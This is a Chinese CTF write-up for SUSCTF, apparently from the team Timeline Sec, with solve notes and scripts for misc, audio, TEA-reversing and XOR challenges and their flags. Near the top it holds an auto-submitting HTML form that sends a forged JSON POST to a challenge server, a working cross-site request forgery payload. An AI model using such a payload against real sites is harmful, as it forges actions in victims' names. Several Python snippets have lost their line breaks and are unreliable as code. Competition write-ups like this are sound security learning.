本次比赛Misc方向题目由魔法少女雪殇、小夜、valen全部解出。团队纳新事项已提上日程,有兴趣的师傅可以留意一下公众号文章。
<html><script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>
<form action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain">
<input id="sub" name='{"username":"gcker", "test":"' value='test"}'type='hidden'>
</form>
<script>
$("form").submit();
</script>
</html>
discord快速截图
★ra2
看地图
★Tanner
转成矩阵,图片010末尾文字,加起来sha256即可
★AUDIO
音频,两个看起来没什么区别,反正这类音频套路要么就是音频叠加,要么就是藏在某处的morse,直接ai分离人声和背景音乐
发现分离后明显有morse,直接听出来转就完了
import mathe = [207, 359, 220, 224, 352, 315, 359, 374, 290, 310, 277, 507, 391, 513, 423, 392, 508, 383, 440, 322, 420, 427, 503, 460, 295, 318, 245, 302, 407, 414, 410, 130, 369, 317]a = 'AnEWmuLTiPLyis_etimes_wiLLbEcomE_B'#b = ['01001', '11010', '00110', '11000', '00001', '10000', '10001', '01011', '01011', '01011', '01110', '00110', '00101', '10010', '00100', '10100', '11010', '10110', '11000', '00101', '11000', '01001', '10010', '01010', '01100', '11010', '10000', '10001', '00101', '00010', '11001', '01000', '01000', '00011']e10= []alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'b = 'NQHFEAOUUUSHLMCJQRFLFNMKGQAOLDWBBI'result = [9,26,6,]#207*26+1/65#101*95 = 26*369+1for i in range(34):#rint(95*101/e[i])a1 = ord(a[i])#print('a:',a1)n = e[i]flag = chr(round((n * 26 + 1)/a1))print(flag)'''for i in e:e10.append(bin(i)[2:])print(e10)'''
用pyinstxtractor 分解
将同名pyc文件改成前struct的pyc文件在线反编译得到
主要逻辑是tea加密
D是delta的二進制形式
脚本
#include <stdio.h>
#include <stdint.h>
// unsigned char ida_chars[] =
//{
// 0x88, 0x34, 0xD9, 0x48, 0x4C, 0x14, 0x0C, 0x03, 0xC2, 0x78,
// 0xEB, 0x52, 0xED, 0xE5, 0x9C, 0xED,0xE6, 0xED, 0x1F, 0xAE, 0x6D, 0x12, 0x5A, 0xBA, 0xAA, //0x84,
// 0x92, 0xCF, 0xE3, 0xF2, 0xE0, 0x65
//};
//解密函数
// void decrypt (uint32_t* v, uint32_t* k) {
// uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i; /* set up */
// uint32_t delta=0x9e3779b9; /* a key schedule constant */
// uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
// for (i=0; i<32; i++) { /* basic cycle start */
// v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
// v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
// sum -= delta;
// } /* end cycle */
// v[0]=v0; v[1]=v1;
// }
void decrypt (uint32_t* v, uint32_t* k) {
uint32_t v0=v[0], v1=v[1], sum=0x9e3779b9*32, i; /* set up */
uint32_t delta=0x9e3779b9;
/* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];/* cache key */
for (i=0; i<32; i++) { /* basic cycle start */
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
sum -= delta;
} /* end cycle */
v[0]=v0; v[1]=v1;
}
int main(){
//unsigned char key[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
uint32_t v[6]={0x3e8947cb,0xcc944639,0x31358388,0x3b0b6893,0xda627361,0x3b2e6427} ,k[4]={17477,0x4144,0x4245,0x4546};
//uint32_t *k = (uint32_t*)key;
//uint32_t *v = (uint32_t*)ida_chars;
// v为要加密的数据是两个32位无符号整数
// k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位
printf("n");
decrypt(v, k);
decrypt(v+2, k);
decrypt(v+4, k);
// decrypt(v+6, k);
//decrypt(v+8, k);
//decrypt(v+10, k);
//decrypt(v+12, k);
//decrypt(v+14, k);
//decrypt(v+16, k);
//decrypt(v+18, k);
// decrypt(v+20, k);
//decrypt(v+22, k);
//decrypt(v+24, k);
for(int i=0;i<6;i++){
printf("%x ",v[i]);
}
printf("n");
//for(int i=0;i<32;i++){
// printf("%c",ida_chars[i]);
//}
return 0;
}
最后再转换为字符
a=[0x58,0x42,0x76,0x66,0x61,0x45,0x64,0x51,0x76,0x62,0x63,0x72,0x78,0x50,0x42,0x68,0x38,0x41,0x4f,0x63,0x4a,0x36,0x67,0x41] for i in range(len(a)): print(chr(a[i]),end='')
最后的flag
SUSCTF{XBvfaEdQvbcrxPBh8AOcJ6gA}
★hello_world
判断输入为44字节,分析case11
sub_14009cc0函数是异或处理
上面的v74与v71是是输入的加密结果和密文,3 2 就是加上2后的结果
脚本:
a= [86,218,205,58,126,134,19,181,29,157,252,151,140,49,107,201,251,26,226,45,220, 211, 241,244,54,9,32, 66,4, 106,113, 83,120, 164,151,143,122,114,57,232,61,250,64,61,408,0, 0, 0] d=[5,143,158,121,42,192,104,129,45,252,207,164,181,85,95,228,157,35,214,29,241,231,151,145,6,36,66,113,60,88,92,48,25,198,245,188,75,66,93,218,88,155,36,64] flag = '' for i in range(len(d)): flag += chr(a[i] ^ d[i]) print(flag)
SUSCTF{40a339d4-f940-4fe0-b382-cabb310d2ead}
PWN
非预期解,直接搜flag就出来了...
本文作者:Timeline Sec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/174221.html
必填 您当前尚未登录。 登录? 注册
必填(保密)